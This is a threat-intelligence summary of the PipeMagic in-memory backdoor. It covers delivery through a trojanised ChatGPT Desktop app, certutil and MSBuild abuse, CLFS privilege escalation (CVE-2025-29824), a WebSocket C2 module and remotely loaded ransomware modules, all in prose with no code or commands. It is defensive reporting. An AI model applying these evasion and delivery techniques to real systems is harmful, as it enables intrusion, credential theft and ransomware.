PipeMagic is a memory-resident backdoor used in targeted intrusions by the financially motivated threat actor Storm-2460. It has been deployed in IT and financial sectors through modified versions of a legitimate open-source ChatGPT Desktop application.

The malware avoids writing to disk and evades traditional detection by operating entirely in memory.

Initial access is gained by exploiting CVE-2025-29824, a zero-day vulnerability in the Windows Common Log File System.

Once active, PipeMagic sets up encrypted communication using named pipes for local coordination and TCP for external command-and-control. It loads additional components into memory as needed. These are managed through internal data structures called doubly linked lists, which organize modules for delivery and execution.

In several campaigns, the backdoor has been used to deploy ransomware after credential harvesting and lateral movement.

Why It Matters: PipeMagic shows how certain threats can bypass enterprise defenses that rely on file activity or policy controls. It runs entirely in memory and uses trusted software for delivery, avoiding the points where most detection tools are focused. Many systems are not built to observe what happens in memory or between internal processes. PipeMagic uses this gap, particularly in environments with remote access and cloud services. These conditions support scale and speed, but they often limit visibility, allowing threats like PipeMagic to remain active without being detected.

• Runs in Memory with Modular Control: PipeMagic is designed to avoid detection by never writing files to disk. All components load directly into memory and stay there while active. The malware organizes its parts using internal memory structures called linked lists. These lists track which modules are ready to run, which are responsible for communication, and which hold additional payloads. New modules can be added or removed during runtime. This lets the attacker adjust functionality based on the environment, without restarting the malware or leaving behind file-based evidence.

• Delivered Through Trusted Software and Tools: The initial infection uses a version of the open-source ChatGPT Desktop application that has been altered to include a malicious payload. Once installed, the malware uses certutil, a standard Windows tool, to download and run a file hosted on a previously compromised website. That file is a malicious script executed using MSBuild, another legitimate Windows utility. These tools are commonly allowed in enterprise environments, making them less likely to be flagged during early stages of intrusion.

• Escalates Privileges Using a CLFS Vulnerability: After it launches, PipeMagic exploits CVE-2025-29824, a vulnerability in the Windows Common Log File System. This step allows the malware to escalate its privileges to system level, giving it full control over the host. Because the vulnerability lies in a part of the operating system that is not widely monitored, it does not generate the usual alerts tied to privilege escalation attempts. Once elevated, the malware can carry out tasks without needing additional tools or user actions.

• C2 Traffic Managed by a Separate Module: Instead of connecting to the attacker’s server from the main backdoor, PipeMagic loads a dedicated network module that handles all external communication. This module builds a connection using WebSocket requests that mimic normal browser traffic, reducing the chance of detection by network security tools. Configuration data for this connection, including the server address and limits on communication attempts, is stored in memory only. Once the connection is active, the malware sends system details and waits for further instructions.

• Payloads Loaded and Controlled Remotely: New modules are sent through the active connection, validated with a hash check, decrypted, and stored in memory. These modules can perform a range of functions, including system scanning, process enumeration, credential theft, or ransomware deployment. The attacker issues commands that tell the malware which module to run and how to use it. Each command is processed in memory, without launching visible processes or writing to disk. This approach allows PipeMagic to change behavior quickly and avoid creating patterns that would trigger detection.

Go Deeper -> Dissecting PipeMagic: Inside the architecture of a modular backdoor framework – Microsoft

Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware – The Hacker News